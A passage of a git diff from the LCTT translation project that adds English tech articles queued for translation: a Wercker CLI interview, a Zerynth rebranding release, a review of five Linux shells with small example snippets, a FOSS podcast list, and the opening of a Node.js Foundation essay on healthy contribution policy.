+作者:[Jim Lynch][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.infoworld.com/author/Jim-Lynch/
+
diff --git a/sources/tech/20160222 Achieving Enterprise-Ready Container Tools With Wercker’s Open Source CLI.md b/sources/tech/20160222 Achieving Enterprise-Ready Container Tools With Wercker’s Open Source CLI.md
new file mode 100644
index 0000000000..81f7467719
--- /dev/null
+++ b/sources/tech/20160222 Achieving Enterprise-Ready Container Tools With Wercker’s Open Source CLI.md
@@ -0,0 +1,80 @@
+Achieving Enterprise-Ready Container Tools With Wercker’s Open Source CLI
+===========================================
+
+For enterprises, containers offer more efficient build environments, cloud-native applications and migration from legacy systems to the cloud. But enterprise adoption of the technology -- Docker specifically -- has been hampered by, among other issues, [a lack of mature developer tools][1].
+
+Amsterdam-based [Wercker][2] is one of many early-stage companies looking to meet the need for better tools with its cloud platform for automating microservices and application development, based on Docker.
+
+The company [announced a $4.5 million Series A][3] funding round this month, which will help it ramp up development on an upcoming on-premise enterprise product. Key to its success, however, will be building a community around its newly [open-sourced CLI][4] tool. Wercker must quickly integrate with myriad other container technologies -- open source Kubernetes and Mesos among them -- to remain competitive in the evolving container space.
+
+“By open sourcing our CLI technology, we hope to get to dev-prod parity faster and turn ‘build once, ship anywhere’ into an automated reality,” said Wercker CEO and founder Micha Hernández van Leuffen.
+
+I reached out to van Leuffen to learn more about the company, its CLI tool, and how it’s planning to help grow the pool of enterprise customers actually using containers in production. Below is an edited version of the interview.
+
+### Linux.com: Can you briefly tell us about Wercker?
+
+van Leuffen: Wercker is a container-centric platform for automating the development of microservices and applications.
+
+With Wercker’s Docker-based infrastructure, teams can increase developer velocity with custom automation pipelines using steps that produce containers as artifacts. Once the build passes, users can continue with the deploy steps specified in the wercker.yml. Continuously repeating these steps allows teams to work in small increments, making it easy to debug and ship faster.
+
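+For readers who have not seen the format, a minimal wercker.yml might look something like the following. This is an illustrative sketch rather than an excerpt from Wercker's documentation; the base image and step contents are assumptions:
+
+    # base Docker image the pipeline runs in
+    box: python:3
+    build:
+      steps:
+        # inline script step: install dependencies and run the tests
+        - script:
+            name: run tests
+            code: |
+              pip install -r requirements.txt
+              pytest
+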
+![](https://www.linux.com/images/stories/66866/wercker-cli.png)
+
+### Linux.com: How does it help developers?
+
+van Leuffen: The Wercker CLI helps developers attain greater dev-prod parity. They’re able to release faster and more often because they are developing, building and testing in an environment very similar to that in production. We’ve open sourced the exact same program that we execute in the Wercker cloud platform to run your pipelines.
+
+### Linux.com: Can you point out some of the features and advantages of your tool as compared to competitors?
+
+van Leuffen: Unlike some of our competitors, we’re not just offering Docker support. With Wercker, the Docker container is the unit of work. All jobs run inside containers, and each build artifact can be a Docker container.
+
+Wercker’s Docker container pipeline is completely customizable. A ‘pipeline’ refers to any automated workflow, for instance, a build or deploy pipeline. In those workflows, you want to execute tasks: install dependencies, test your code, push your container, or create a slack notification when something fails, for example. We call these tasks ‘steps,’ and there is no limit to the types of steps created. In fact, we have a marketplace of steps built by the Wercker community. So if you’ve built a step that fits my workflow, I can use that in my pipeline.
+
+Our Docker container pipelines adapt to any developer workflow. Users can use any Docker container out there — not just those made by or for Wercker. Whether the container is on Docker Hub or a private registry such as CoreOS’s Quay, it works with Wercker.
+
+Our competitors range from the classic CI/CD tools to larger-scale DevOps solutions like CloudBees.
+
+### Linux.com: How does it integrate with other cloud technologies?
+
+van Leuffen: Wercker is vendor-agnostic and can automate development with any cloud platform or service. We work closely with ecosystem partners like Mesosphere, Kubernetes and CoreOS to make integrations as seamless as possible. We also recently partnered with Atlassian to integrate the Wercker platform with Bitbucket. More than 3 million Bitbucket users can install the Wercker Pipeline Viewer and view build status directly from their dashboard.
+
+### Linux.com: Why did you open source the Wercker CLI tool?
+
+van Leuffen: Open sourcing the Wercker CLI will help us stay ahead of the curve and strengthen the developer community. The market landscape is changing fast; developers are expected to release more frequently, using infrastructure of increasing complexity. While Docker has solved a lot of infrastructure problems, developer teams are still looking for the perfect tools to test, build and deploy rapidly.
+
+The Wercker community is already experimenting with these new tools: Kubernetes, Mesosphere, CoreOS. It makes sense to tap that community to create integrations that work with our technology – and make that process as frictionless as possible. By open sourcing our CLI technology, we hope to get to dev-prod parity faster and turn “build once, ship anywhere” into an automated reality.
+
+### Linux.com: You recently raised over $4.5 million, so how is this fund being used for product development?
+
+van Leuffen: We’re focused on building out our commercial team and bringing an enterprise product to market. We’ve had a lot of inbound interest from the enterprise looking for VPC and on-premise solutions. While the enterprise is still largely in the discovery stage, we can see the market shifting toward containers. Enterprise software devs need to release often, just like the small, agile teams with whom they are increasingly competing. We need to prove containers can scale, and that Wercker has the organizational permissions and the automation suite to make that process as efficient as possible.
+
+In addition to continuing to invest in our product, we’ll be focusing our resources on market education and developer evangelism. Developer teams are still looking for the right mix of tools to test, build and deploy rapidly (including Kubernetes, Mesosphere, CoreOS, etc.). As an ecosystem, we need to do more to educate and provide the tutorials and resources to help developers succeed in this changing landscape.
+
+### Linux.com: What products do you offer and who is your target audience?
+
+van Leuffen: We currently offer one service level of our product Wercker; however, we’re developing an enterprise offering. Current organizations using Wercker range from startups, such as Open Listings, to larger companies and big agencies, like Pivotal Labs.
+
+
+### Linux.com: What does this recently open-sourced CLI do?
+
+van Leuffen: Using the Wercker Command Line Interface (CLI), developers can spin up Docker containers on their desktop, automate their build and deploy processes and then deploy them to various cloud providers, like AWS, and scheduler and orchestration platforms, such as Mesosphere and Kubernetes.
+
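+As a quick illustration, running a pipeline locally comes down to invoking the CLI from a project directory that contains a wercker.yml (a sketch with a hypothetical project name):
+
+    $ cd my-project      # directory containing a wercker.yml
+    $ wercker build      # run the build pipeline locally in Docker containers
+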
+The Wercker Command Line Interface is available as an open source project on GitHub and runs on both OSX and Linux machines.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/news/enterprise/systems-management/887177-achieving-enterprise-ready-container-tools-with-werckers-open-source-cli
+
+作者:[Swapnil Bhartiya][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/community/forums/person/61003
+[1]:http://thenewstack.io/adopting-containers-enterprise/
+[2]:http://wercker.com/
+[3]:http://venturebeat.com/2016/01/28/wercker-raises-4-5-million-open-sources-its-command-line-tool/
+[4]:https://github.com/wercker/wercker
+
+
diff --git a/sources/tech/20160301 Viper, the Python IoT Development Suite, is now Zerynth.md b/sources/tech/20160301 Viper, the Python IoT Development Suite, is now Zerynth.md
new file mode 100644
index 0000000000..f732382bc6
--- /dev/null
+++ b/sources/tech/20160301 Viper, the Python IoT Development Suite, is now Zerynth.md
@@ -0,0 +1,35 @@
+(翻译中 by runningwater)
+Viper, the Python IoT Development Suite, is now Zerynth
+============================================================
+
+
+![](http://www.open-electronics.org/wp-content/uploads/2016/02/Logo_Zerynth-636x144.png)
+
+
+The startup that launched the tools to develop embedded solutions in the Python language has announced its rebranding along with the first official release.
+
+>Exactly one year after the Kickstarter launch of the suite for developing Internet of Things solutions in Python language, **Viper becomes Zerynth**. It is definitely a big day for the startup that created a radically new way to approach the world of microcontrollers and connected devices, making professionals and makers able to design interactive solutions with reduced efforts and shorter time.
+
+>“We really believe in the uniqueness of our tools, this is why they deserve an adequate recognition. Viper was a great name for a product, but other notable companies had the same feeling many decades ago, with the result that this term was shared with too many other actors out there. We are grown now, and ready to take off fast and light, like the design processes that our tools are enabling”, says the Viper (now Zerynth), co-founders.
+
+>**Thousands of users** developed amazing connected solutions in just 9 months of life in Beta version. Built to be cross-platform, Zerynth’s tools are meant for high-level design of Internet/cloud-connected devices, interactive objects, artistic installations. They are: **Zerynth Studio**, a browser-based IDE for programming embedded devices in Python with cloud sync and board management features; **Zerynth Virtual Machine**: a multithreaded real-time OS that provides real hardware independence allowing code reuse on the entire ARM architecture; **Zerynth App**, a general purpose interface that turns any mobile into the controller and display for smart objects and IoT systems.
+
+>This modular set of tools, adaptable to different hardware and cloud infrastructures, can dramatically reduce the time to market and the overall development costs for makers, professionals and companies.
+
+>Now Zerynth celebrates its new name launching the **first official release** of the toolkit. Check it here [www.zerynth.com][1]
+
+![](http://www.open-electronics.org/wp-content/uploads/2016/02/Zerynth-Press-Release_Studio-Img-768x432.png)
+
+--------------------------------------------------------------------------------
+
+via: http://www.open-electronics.org/viper-the-python-iot-development-suite-is-now-zerynth/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+OpenElectronics+%28Open+Electronics%29
+
+作者:[Staff ][a]
+译者:[runningwater](https://github.com/runningwater)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.open-electronics.org/author/staff/
+[1]: http://www.zerynth.com/
+
diff --git a/sources/tech/20160303 Top 5 open source command shells for Linux.md b/sources/tech/20160303 Top 5 open source command shells for Linux.md
new file mode 100644
index 0000000000..8705ad2981
--- /dev/null
+++ b/sources/tech/20160303 Top 5 open source command shells for Linux.md
@@ -0,0 +1,90 @@
+翻译中;by ping
+Top 5 open source command shells for Linux
+===============================================
+
+keyword: shell, Linux, bash, zsh, fish, ksh, tcsh, license
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/terminal_blue_smoke_command_line_0.jpg?itok=u2mRRqOa)
+
+There are two kinds of Linux users: the cautious and the adventurous.
+
+On one side is the user who almost reflexively tries out every new option that hits the scene. They’ve tried handfuls of window managers, dozens of distributions, and every new desktop widget they can find.
+
+On the other side is the user who finds something they like and sticks with it. They tend to like their distribution’s defaults. If they’re passionate about a text editor, it’s whichever one they mastered first.
+
+As a Linux user, both on the server and the desktop, for going on fifteen years now, I am definitely more in the second category than the first. I have a tendency to use what’s presented to me, and I like the fact that this means more often than not I can find thorough documentation and examples of almost any use case I can dream up. If I used something non-standard, the switch was carefully researched and often prompted by a strong pitch from someone I trust.
+
+But that doesn’t mean I don’t like to sometimes try and see what I’m missing. So recently, after years of using the bash shell without even giving it a thought, I decided to try out four alternative shells: ksh, tcsh, zsh, and fish. All four were easy installs from my default repositories in Fedora, and they’re likely already packaged for your distribution of choice as well.
+
+Here’s a little bit on each option and why you might choose it to be your next Linux command-line interpreter.
+
+### bash
+
+First, let’s take a look back at the familiar. [GNU Bash][1], the Bourne Again Shell, has been the default in pretty much every Linux distribution I’ve used through the years. Originally released in 1989, bash has grown to easily become the most used shell across the Linux world, and it is commonly found in other unix-like operating systems as well.
+
+Bash is a perfectly respectable shell, and as you look for documentation of how to do various things across the Internet, almost invariably you’ll find instructions which assume you are using a bash shell. But bash has some shortcomings, as anyone who has ever written a bash script that’s more than a few lines can attest to. It’s not that you can’t do something, it’s that it’s not always particularly intuitive (or at least elegant) to read and write. For some examples, see this list of [common bash pitfalls][2].
+
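+To pick one classic pitfall from that list as a quick illustration (my own example): an unquoted variable is split on whitespace, so a file name containing a space breaks the test:
+
+    #!/bin/bash
+    file="my file.txt"
+    touch "$file"
+
+    # wrong: $file expands to two words and the test errors out
+    if [ -f $file ]; then echo "found (unquoted)"; fi
+
+    # right: quoting keeps the file name as a single word
+    if [ -f "$file" ]; then echo "found (quoted)"; fi
+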
+That said, bash is probably here to stay for at least the near future, with its enormous install base and legions of both casual and professional system administrators who are already attuned to its usage, and quirks. The bash project is available under a [GPLv3][3] license.
+
+### ksh
+
+[KornShell][4], also known by its command invocation, ksh, is an alternative shell that grew out of Bell Labs in the 1980s, written by David Korn. While originally proprietary software, later versions were released under the [Eclipse Public License][5].
+
+Proponents of ksh list a number of ways in which they feel it is superior, including having a better loop syntax, cleaner exit codes from pipes, an easier way to repeat commands, and associative arrays. It's also capable of emulating many of the behaviors of vi or emacs, so if you are very partial to a text editor, it may be worth giving a try. Overall, I found it to be very similar to bash for basic input, although for advanced scripting it would surely be a different experience.
+
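+Associative arrays, for example, have been in ksh93 since long before bash gained them in version 4. A tiny sketch of my own:
+
+    #!/bin/ksh
+    typeset -A color          # declare an associative array
+    color[apple]=red
+    color[banana]=yellow
+    print "${color[apple]}"   # prints: red
+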
+### tcsh
+
+[Tcsh][6] is a derivative of csh, the Berkeley Unix C shell, and sports a very long lineage back to the early days of Unix and computing itself.
+
+The big selling point for tcsh is its scripting language, which should look very familiar to anyone who has programmed in C. Tcsh's scripting is loved by some and hated by others. But it has other features as well, including adding arguments to aliases, and various defaults that might appeal to your preferences, including the way autocompletion with tab and history tab completion work.
+
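+Even a trivial counting loop shows the C flavor of the syntax (my own sketch):
+
+    #!/bin/tcsh
+    # C-style arithmetic with @ and a while/end block
+    @ i = 1
+    while ($i <= 3)
+        echo "pass $i"
+        @ i++
+    end
+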
+You can find tcsh under a [BSD license][7].
+
+### zsh
+
+[Zsh][8] is another shell which has similarities to bash and ksh. Originating in the early 90s, zsh sports a number of useful features, including spelling correction, theming, namable directory shortcuts, sharing your command history across multiple terminals, and various other slight tweaks from the original Bourne shell.
+
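+The namable directory shortcuts, for instance, take only two lines (a small sketch of my own):
+
+    # name a directory, then jump to it from anywhere with ~proj
+    hash -d proj=~/code/project
+    cd ~proj
+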
+The code and binaries for zsh can be distributed under an MIT-like license, though portions are under the GPL; check the [actual license][9] for details.
+
+### fish
+
+I knew I was going to like the Friendly Interactive Shell, [fish][10], when I visited the website and found it described tongue-in-cheek with "Finally, a command line shell for the 90s"—fish was written in 2005.
+
+The authors of fish offer a number of reasons to make the switch, all invoking a bit of humor and poking a bit of fun at shells that don't quite live up. Features include autosuggestions ("Watch out, Netscape Navigator 4.0") and support for the "astonishing" 256-color palette of VGA, but also some genuinely helpful things, including command completion based on the man pages on your machine, clean scripting, and a web-based configuration.
+
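+The web-based configuration, for what it's worth, is a single command away once fish is installed:
+
+    # opens fish's configuration UI in your default browser
+    fish_config
+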
+Fish is licensed primarily under the GPL version 2 but with portions under other licenses; check the repository for [complete information][11].
+
+***
+
+Looking for a more detailed rundown on the precise differences between each option? [This site][12] ought to help you out.
+
+So where did I land? Well, ultimately, I’m probably going back to bash, because the differences were subtle enough that someone who mostly used the command line interactively as opposed to writing advanced scripts really wouldn't benefit much from the switch, and I'm already pretty comfortable in bash.
+
+But I’m glad I decided to come out of my shell (ha!) and try some new options. And I know there are many, many others out there. Which shells have you tried, and which one do you prefer? Let us know in the comments!
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/business/16/3/top-linux-shells
+
+作者:[Jason Baker][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/jason-baker
+
+[1]: https://www.gnu.org/software/bash/
+[2]: http://mywiki.wooledge.org/BashPitfalls
+[3]: http://www.gnu.org/licenses/gpl.html
+[4]: http://www.kornshell.org/
+[5]: https://www.eclipse.org/legal/epl-v10.html
+[6]: http://www.tcsh.org/Welcome
+[7]: https://en.wikipedia.org/wiki/BSD_licenses
+[8]: http://www.zsh.org/
+[9]: https://sourceforge.net/p/zsh/code/ci/master/tree/LICENCE
+[10]: https://fishshell.com/
+[11]: https://github.com/fish-shell/fish-shell/blob/master/COPYING
+[12]: http://hyperpolyglot.org/unix-shells
+
diff --git a/sources/tech/20160314 15 podcasts for FOSS fans.md b/sources/tech/20160314 15 podcasts for FOSS fans.md
new file mode 100644
index 0000000000..eae53102ad
--- /dev/null
+++ b/sources/tech/20160314 15 podcasts for FOSS fans.md
@@ -0,0 +1,80 @@
+zpl1025
+15 podcasts for FOSS fans
+=============================
+
+keyword: FOSS, podcast
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/oss_podcasts.png?itok=3KwxsunX)
+
+I listen to a lot of podcasts. A lot. On my phone's podcatcher, I am subscribed to around 60 podcasts... and I think that only eight of those have podfaded (died). Unsurprisingly, a fairly sizeable proportion of those remaining alive-and-well subscriptions are shows with a specific interest or relevance to open source software. As I seek to resurrect my own comatose podcast from the nebulous realm of podfadery, I thought it would be great for us as a community to share what we're listening to.
+
+>Quick digression: I understand that there are a lot of "pod"-prefixed words in that first paragraph. Furthermore, I also know that the term itself is related to a proprietary device that, by most accounts, isn't even used for listening to these web-based audio broadcasts. However, the term 'webcast' died in the nineties and 'oggcast' never gathered a substantial foothold among the listening public. As such, in order to ensure that the most people actually know what I'm referring to, I'm essentially forced to use the web-anachronistic, but publicly recognized term, podcast.
+
+I should also mention that a number of these shows involve grown-ups using grown-up language (i.e. swearing). I've tried to indicate which shows these are by putting a red E next to their names, but please do your own due diligence if you're concerned about listening to these shows at work or with children around.
+
+The following lists are podcasts that I keep in heavy rotation (each sublist is listed in alphabetical order). In the first list are the ones I think of as my "general coverage" shows. They tend to either discuss general topics related to free and open source software, or they give a survey of multiple open source projects from one episode to the next.
+
+- [Bad Voltage][1] E — Regular contributor and community moderator here on Opensource.com, Jono Bacon, shares hosting duties on this podcast with Jeremy Garcia, Stuart Langridge, and Bryan Lunduke, four friends with a variety of diverging and intersecting opinions. That's the most interesting part of the show for me. Of course, they also do product reviews and cover timely news relevant to free and open source software, but it's the banter that I stick around for.
+
+- [FLOSS Weekly][2] — The Twit network of podcasts is a long-time standby in technology broadcasts. Hosted by Randal Schwartz, FLOSS Weekly focuses on covering one open source project each week, typically by interviewing someone relevant in the development of that project. It's a really good show for getting exposed to new open source tools... or learning more about the programs you're already familiar with.
+
+- [Free as in Freedom][3] — Hosted by Bradley Kuhn and Karen Sandler, this show has a specific focus on legal and policy matters as it relates to both specific free and open source projects, as well as open culture in general. The show seems to have gone on a bit of a hiatus since its last episode in November of 2015, but I for one am immensely hopeful that Free as in Freedom emerges victoriously from its battle with being podfaded and returns to its regular bi-weekly schedule.
+
+- [GNU World Order][4] — I think that this show can best be described as a free and open source variety show. Solo host Klaatu spends the majority of each show going in-depth at nearly tutorial level with a whole range of specific software tools and workflows. It's a really friendly way to get an open source neophyte up to speed with everything from understanding SSH to playing with digital painting and video. And there's a video component to the show, too, which certainly helps make some of these topics easier to follow.
+
+- [Hacker Public Radio][5] — This is just a well-executed version of a fantastic concept. Hacker Public Radio (HPR) is a community-run daily (well, working-week daily) podcast with a focus on "anything of interest to hackers." Sure there are wide swings in audio quality from show to show, but it's an open platform where anyone can share what they know (or what they think) in that topic space. Show topics include 3D printing, hardware hacking, conference interviews, and more. There are even long-running tutorial series and an audio book club. The monthly recap episodes are particularly useful if you're having trouble picking a place to start. And best of all, you can record your own episode and add it to the schedule. In fact, they actively encourage it.
+
+My next list of open source podcasts are a bit more specific to particular topics or software packages in the free and open source ecosystem.
+
+- [Blender Podcast][6] — Although this podcast is very specific to one particular application—Blender, in case you couldn't guess—many of the topics are relevant to issues faced by users and developers of other open source software programs. Hosts Thomas Dinges and Campbell Barton—both on the core development team for Blender—discuss the latest happenings in the Blender community, sometimes with a guest. The release schedule is a bit sporadic, but one of the things I really like about this particular show is the fact that they talk about both user issues and developer issues... and the various intersections of the two. It's a great way for each part of the community to gain insight from the other.
+
+- [Sunday Morning Linux Review][7] — As its name indicates, SMLR offers a weekly review of topics relevant to Linux. Since around the end of last year, the show has seen a bit of a restructuring. However, that has not detracted from its quality. Tony Bemus, Mary Tomich, and Tom Lawrence deliver a lot of good information, and you can catch them recording their shows live through their website (if you happen to have free time on your Sundays).
+
+- [LinuxLUGcast][8] — The LinuxLUGcast is a community podcast that's really a recording of an online Linux Users Group (LUG) that meets on the first and third Friday of each month. The group meets (and records) via Mumble and discussions range from home builds with single-board computers like the Raspberry Pi to getting help with trying out a new distro. The LUG is open to everyone, but there is a rotating cast of regulars who've made themselves (and their IRC handles) recognizable fixtures on the show. (Full disclosure: I'm a regular on this one)
+
+- [The Open EdTech Podcast][9] — Thaj Sara's Open EdTech Podcast is a fairly new show that so far only has three episodes. However, since there's a really sizeable community of open source users in the field of education (both in teaching and in IT), this show serves an important and underserved segment of our community. I've spoken with Thaj via email and he assures me that new episodes are in the pipe. He just needs to set aside the time to edit them.
+
+- [The Linux Action Show][10] — It would be remiss of me to make a list of open source podcasts and not mention one of the stalwart fixtures in the space: The Linux Action Show. Chris Fisher and Noah Chelliah discuss current news as it pertains to Linux and open source topics while at the same time giving feature attention to specific projects or their own experiences using various open source tools.
+
+This next section is what I'm going to term my "honorable mention" section. These shows are either new or have a more tangential focus on open source software and culture. In any case, I still think readers of Opensource.com would enjoy listening to these shows.
+
+- [Blender Institute Podcast][11] — The Blender Institute—the more commercial creative production spin-off from the Blender Foundation—started hosting their own weekly podcast a few months ago. In the show, artists (and now a developer!) working at the Institute discuss the open content projects they're working on, answer questions about using Blender, and give great insight into how things go (or occasionally don't go) in their day-to-day work.
+
+- [Geek News Radio][12] E — There was a tangible sense of loss about a year ago when the hosts of Linux Outlaws hung up their mics. Well good news! A new show has sprung from its ashes. In episodes of Geek News Radio, Fab Scherschel and Dave Nicholas have a wider focus than Linux Outlaws did. Rather than being an actual news podcast, it's more akin to an informal discussion among friends about video games, movies, technology, and open source (of course).
+
+- [Geekrant][13] — Formerly known as the Everyday Linux Podcast, this show was rebranded at the start of the year to reflect the kind of content that the hosts Mark Cockrell, Seth Anderson, and Chris Neves were already discussing. They do discuss open source software and culture, but they also give their own spin and opinions on topics of interest in general geek culture. Topics have a range that includes everything from popular media to network security. (P.S. Opensource.com content manager Jen Wike Huger was a guest on Episode 164.)
+
+- [Open Source Creative][14] E — In case you haven't read my little bio blurb, I also have my own podcast. In this show, I talk about news and topics that are [hopefully] of interest to artists and creatives who use free and open source tools. I record it during my work commute so episode length varies with traffic, and I haven't quite figured out a good way to do interviews safely, but if you listen while you're on your way to work, it'll be like we're carpooling. The show has been on a bit of hiatus for almost a year, but I've committed to making sure it comes back... and soon.
+
+- [Still Untitled][15] E — As you may have noticed from most of the selections on this list, I tend to lean toward the indie side of the spectrum, preferring to listen to shows by people with less of a "name." That said, this show really hits a good place for me. Hosts Adam Savage, Norman Chan, and Will Smith talk about all manner of interesting and geeky things. From Adam's adventures with Mythbusters to maker builds and book reviews, there's rarely ever a show that hasn't been fun for me to listen to.
+
+So there you go! I'm always looking for more interesting shows to listen to on my commute (as I'm sure many others are). What suggestions or recommendations do you have?
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/3/open-source-podcasts
+
+作者:[Jason van Gumster][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/jason-van-gumster
+[1]: http://badvoltage.org/
+[2]: https://twit.tv/shows/floss-weekly
+[3]: http://faif.us/
+[4]: http://gnuworldorder.info/
+[5]: http://hackerpublicradio.org/
+[6]: https://blender-podcast.org/
+[7]: http://smlr.us/
+[8]: http://linuxlugcast.com/
+[9]: http://openedtechpodcast.com/
+[10]: http://www.jupiterbroadcasting.com/tag/linux-action-show/
+[11]: http://podcast.blender.institute/
+[12]: http://sixgun.org/geeknewsradio
+[13]: http://elementopie.com/geekrant-episodes
+[14]: http://monsterjavaguns.com/podcast
+[15]: http://www.tested.com/still-untitled-the-adam-savage-project/
diff --git a/sources/tech/20160314 Healthy Open Source.md b/sources/tech/20160314 Healthy Open Source.md
new file mode 100644
index 0000000000..57dd559284
--- /dev/null
+++ b/sources/tech/20160314 Healthy Open Source.md
@@ -0,0 +1,213 @@
+Translating by yuba0604
+Healthy Open Source
+============================
+
+keyword: Node.js, opensource, project management, software
+
+*A walkthrough of the Node.js Foundation’s base contribution policy*.
+
+A lot has changed since io.js and Node.js merged under the Node.js Foundation. The most impressive change, and probably the change that is most relevant to the rest of the community and to open source in general, is the growth in contributors and committers to the project.
+
+A few years ago, Node.js had just a few committers (contributors with write access to the repository in order to merge code and triage bugs). The maintenance overhead for the few committers on Node.js Core was overwhelming and the project began to see a decline in both committers and outside contribution. This resulted in a corresponding decline in releases.
+
+Today, the Node.js project is divided into many components with a full org size of well over 400 members. Node.js Core now has over 50 committers and over 100 contributors per month.
+
+Through this growth we’ve found many tools that help scale the human infrastructure around an Open Source project. We also identified a few core values we believe are fundamental to modern Open Source: transparency, participation, and efficacy. As we continue to scale the way we do Open Source, we try to find a balance of these values and adapt the practices we find helpful to fit the needs of each component of the Node.js project.
+
+Now that Node.js is in a good place, the foundation is looking to promote this kind of sustainability in the ecosystem. Part of this is a new umbrella for additional projects to enter the foundation, to which [Express was recently admitted][1], and the creation of this new contribution policy.
+
+This contribution policy is not universal. It’s meant as a starting point. Additions and alterations to this policy are encouraged so that the process used by each project fits its needs and can continue to change shape as the project grows and faces new challenges.
+
+The [current version][2] is hosted in the Node.js Foundation. We expect to iterate on this over time and encourage people to [log issues][3] with questions and feedback regarding the policy for future iterations.
+
+This document describes a very simple process suitable for most projects in the Node.js ecosystem. Projects are encouraged to adopt this whether they are hosted in the Node.js Foundation or not.
+
+The Node.js project is organized into over a hundred repositories and a few dozen Working Groups. There are large variations in contribution policy between many of these components because each one has different constraints. This document is a minimalist version of the processes and philosophy we’ve found works best everywhere.
+
+We believe that contributors should own their projects, and that includes contribution policies like this. While new foundation projects start with this policy, we expect many of them to alter it or possibly diverge from it entirely to suit their own specific needs.
+
+The goal of this document is to create a contribution process that:
+
+* Encourages new contributions.
+
+* Encourages contributors to remain involved.
+
+* Avoids unnecessary processes and bureaucracy whenever possible.
+
+* Creates a transparent decision making process which makes it clear how contributors can be involved in decision making.
+
+Most contribution processes are created by maintainers who feel overwhelmed by outside contributions. These documents have traditionally been about processes that make life easier for a small group of maintainers, often at the cost of attracting new contributors.
+
+We’ve gone the opposite direction. The purpose of this policy is to gain contributors, to retain them as much as possible, and to use a much larger and growing contributor base to manage the corresponding influx of contributions.
+
+As projects mature, there’s a tendency to become top heavy and overly hierarchical as a means of quality control and this is enforced through process. We use process to add transparency that encourages participation which grows the code review pool which leads to better quality control.
+
+This document is based on much prior art in the Node.js community, io.js, and the Node.js project.
+
+This document is based on what we’ve learned growing the Node.js project. Not just the core project, which has been a massive undertaking, but also much smaller sub-projects like the website which have very different needs and, as a result, very different processes.
+
+When we began these reforms in the Node.js project, we were taking a lot of inspiration from the broader Node.js ecosystem. In particular, Rod Vagg’s [OPEN Open Source policy][4]. Rod’s work in levelup and nan is the basis for what we now call “liberal contribution policies.”
+
+### Vocabulary
+
+* A **Contributor** is any individual creating or commenting on an issue or pull request.
+
+* A **Committer** is a subset of contributors who have been given write access to the repository.
+
+* A **TC (Technical Committee)** is a group of committers representing the required technical expertise to resolve rare disputes.
+
+Every person who shows up to comment on an issue or submit code is a member of a project’s community. Just being able to see them means that they have crossed the line from being a user to being a contributor.
+
+Typically open source projects have had a single distinction for those that have write access to the repository and those empowered with decision making. We’ve found this to be inadequate and have separated this into two distinctions which we’ll dive into more a bit later.
+
+![](https://www.linux.com/images/stories/66866/healthy_1.png)
+
+Looking at the community in and around a project as a bunch of concentric circles helps to visualize this.
+
+In the outermost circle are users, a subset of those users are contributors, a subset of contributors become committers who can merge code and triage issues. Finally, a smaller group of trusted experts who only get pulled in to the hard problems and can act as a tie-breaker in disputes.
+
+This is what a healthy project should look like. As the demands on the project from increased users rise, so do the contributors, and as contributors increase more are converted into committers. As the committer base grows, more of them rise to the level of expertise where they should be involved in higher level decision making.
+
+![](https://www.linux.com/images/stories/66866/healthy-2.png)
+
+If these groups don’t grow in proportion to each other they can’t carry the load imposed on them by outward growth. A project’s ability to convert people from each of these groups is the only way it can stay healthy if its user base is growing.
+
+This is what unhealthy projects look like in their earliest stages of dysfunction, but imagine that the committers bubble is so small you can’t actually read the word “committers” in it, and imagine this is a logarithmic scale.
+
+A massive user base is pushing a lot of contributions onto a very small number of maintainers.
+
+This is when maintainers build processes and barriers to new contributions as a means to manage the workload. Often the problems the project is facing will be attributed to the tools the project is using, especially GitHub.
+
+In Node.js we had all the same problems, resolved them without a change in tooling, and today manage a growing workload much larger than most projects, and GitHub has not been a bottleneck.
+
+We know what happens to unhealthy projects over a long enough time period: more maintainers leave, contributions eventually fall, and **if we’re lucky** users leave it. When we aren’t so lucky, adoption continues and years later we’re plagued with security and stability issues in widely adopted software that can’t be effectively maintained.
+
+The number of users a project has is a poor indicator of the health of the project, often it is the most used software that suffers the biggest contribution crisis.
+
+### Logging
+
+Log an issue for any question or problem you might have. When in doubt, log an issue; any additional policies about what to include will be provided in the responses. The only exception is security disclosures, which should be sent privately.
+
+The first sentence is surprisingly controversial. A lot of maintainers complain that there isn’t a more heavy handed way of forcing people to read a document before they log an issue on GitHub. We have documents all over projects in the Node.js Foundation about writing good bug reports but, first and foremost, we encourage people to log something and try to avoid putting barriers in the way of that.
+
+Sure, we get bad bugs, but we have a ton of contributors who can immediately work with people who log them to educate them on better practices and treat it as an opportunity to educate. This is why we have documentation on writing good bugs, in order to educate contributors, not as a barrier to entry.
+
+Creating barriers to entry just reduces the number of people there’s a chance to identify, educate and potentially grow into greater contributors.
+
+Of course, never log a public issue about a security disclosure, ever. This is a bit vague about the best private venue because we can’t determine that for every project that adopts this policy, but we’re working on a responsible disclosure mechanism for the broader community (stay tuned).
+
+Committers may direct you to another repository, ask for additional clarifications, and add appropriate metadata before the issue is addressed.
+
+For smaller projects this isn’t a big deal but in Node.js we’ve had to continually break off work into other, more specific, repositories just to keep the volume on a single repo manageable. But all anyone has to do when someone puts something in the wrong place is direct them to the right one.
+
